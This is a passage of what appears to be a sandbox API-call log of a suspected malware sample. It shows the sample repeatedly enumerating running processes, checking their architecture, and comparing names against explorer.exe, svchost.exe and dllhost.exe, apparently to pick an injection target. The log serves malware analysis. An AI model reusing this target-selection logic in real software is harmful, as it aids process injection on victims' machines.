(hObject=0xd8) returned 1 [0182.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0182.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0182.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.084] CloseHandle (hObject=0xd8) returned 1 [0182.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0182.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0182.085] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.085] CloseHandle (hObject=0xd8) returned 1 [0182.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0182.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0182.086] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.086] CloseHandle (hObject=0xd8) returned 1 [0182.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0182.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0182.087] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.087] CloseHandle (hObject=0xd8) returned 1 [0182.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0182.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0182.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0182.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0182.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0182.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0182.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0182.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0182.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.091] CloseHandle (hObject=0xd8) returned 1 [0182.091] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0182.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0182.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.092] CloseHandle (hObject=0xd8) returned 1 [0182.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0182.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0182.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0182.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0182.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0182.093] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.093] CloseHandle (hObject=0xd8) returned 1 [0182.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0182.094] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.094] CloseHandle (hObject=0xd8) returned 1 [0182.094] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0182.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0182.094] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.094] CloseHandle (hObject=0xd8) returned 1 [0182.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0182.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0182.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.095] CloseHandle (hObject=0xd8) returned 1 [0182.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0182.096] CloseHandle (hObject=0xd4) returned 1 [0182.096] Sleep (dwMilliseconds=0x3e8) [0183.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0183.108] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0183.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0183.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0183.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0183.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0183.111] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0183.111] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0183.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0183.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0183.113] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0183.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0183.113] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0183.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0183.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0183.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0183.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0183.116] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0183.116] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0183.117] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0183.117] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0183.118] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.118] CloseHandle (hObject=0xd8) returned 1 [0183.118] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0183.118] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0183.118] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0183.118] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0183.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0183.119] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.119] CloseHandle (hObject=0xd8) returned 1 [0183.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0183.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0183.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0183.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0183.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0183.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0183.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0183.121] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.121] CloseHandle (hObject=0xd8) returned 1 [0183.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0183.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0183.121] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.121] CloseHandle (hObject=0xd8) returned 1 [0183.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0183.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0183.122] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.122] CloseHandle (hObject=0xd8) returned 1 [0183.122] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0183.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0183.123] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.123] CloseHandle (hObject=0xd8) returned 1 [0183.123] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0183.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0183.123] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.123] CloseHandle (hObject=0xd8) returned 1 [0183.123] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0183.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0183.124] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.124] CloseHandle (hObject=0xd8) returned 1 [0183.124] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0183.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0183.124] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.124] CloseHandle (hObject=0xd8) returned 1 [0183.124] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0183.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0183.125] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.125] CloseHandle (hObject=0xd8) returned 1 [0183.125] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0183.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0183.126] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.126] CloseHandle (hObject=0xd8) returned 1 [0183.126] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0183.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0183.126] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.126] CloseHandle (hObject=0xd8) returned 1 [0183.126] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0183.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0183.127] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.127] CloseHandle (hObject=0xd8) returned 1 [0183.127] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, 